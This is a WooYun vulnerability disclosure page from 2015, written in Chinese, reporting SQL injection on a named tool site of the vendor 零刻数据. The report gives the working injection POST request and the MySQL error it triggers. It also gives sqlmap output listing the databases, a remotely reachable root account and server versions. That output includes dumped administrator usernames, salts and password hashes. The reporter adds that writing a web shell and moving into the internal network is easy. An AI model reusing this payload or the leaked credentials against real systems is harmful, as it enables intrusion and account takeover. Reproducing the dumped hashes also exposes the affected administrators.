当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0101871

漏洞标题:零刻数据某站mysql注入root远程登录影响大量数据库

相关厂商:零刻数据

漏洞作者: 路人甲

提交时间:2015-03-18 12:33

修复时间:2015-05-02 12:34

公开时间:2015-05-02 12:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-18: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-05-02: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

问题:tool.link3c.com
area isp 存在注入,其他自测
这个可以远程登录mysql,注入可以直接写shell,而且有权限访问cloud数据库,还有大量管理员,深入渗透进内网无压力。

POST /site/getDnsIp HTTP/1.1
Host: tool.link3c.com
Proxy-Connection: keep-alive
Content-Length: 277
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://tool.link3c.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 
Content-Type: application/x-www-form-urlencoded
DNT: 1
Referer: http://tool.link3c.com/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4
isp=1%2c2%2c3%2c4%2c5'&area=9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%
2C41%2C42%2C43%2C45%2C46%2C47%2C49%2C50%2C51%2C53&domain=baidu.com
CDbCommand 无法执行 SQL 语句: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL 
server version for the right syntax to use near '') AND area_id IN (9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29' at line 1


available databases [8]:
[*] cloud
[*] information_schema
[*] ip022
[*] link3c
[*] mysql
[*] order
[*] performance_schema
[*] tool
database management system users [3]:
[*] 'remote_root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
web server operating system: Linux CentOS 5.8
web application technology: Apache 2.2.3, PHP 5.4.5
back-end DBMS: MySQL >= 5.0.0
[02:08:41] [INFO] fetching columns for table 'user' in database 'order'
[02:08:41] [INFO] fetching entries for table 'user' in database 'order'
[02:08:42] [INFO] analyzing table dump for possible password hashes
[02:08:42] [INFO] recognized possible password hashes in column 'password'
[02:08:42] [WARNING] writing hashes to file '/tmp/tmpVq24gL.txt' for eventual further processing with other tools
do you want to crack them via a dictionary-based attack? [Y/n/q] n
Database: order
Table: user
[1 entry]
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 3  | admin    | 21232f297a57a5a743894a0e4a801fc3 |
+----+----------+----------------------------------+
Database: cloud
[8 tables]
+------------------------+
| cloud_admin            |
| cloud_down_log         |
| cloud_log              |
| cloud_moniter_by       |
| cloud_moniter_by_group |
| cloud_moniter_log      |
| cloud_moniter_server   |
| cloud_moniter_type     |
+------------------------+
---+
| id | salt   | email             | username | password                         |
+----+--------+-------------------+----------+----------------------------------+
| 1  | iwmgwi | [email protected] | admin    | f570635d744dced2c5c34c95f78e05ac |
| 3  | 6jfhhl | [email protected] | David    | 638abe4873b0edcbd85743c74612964c |
+----+--------+-------------------+----------+--------


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝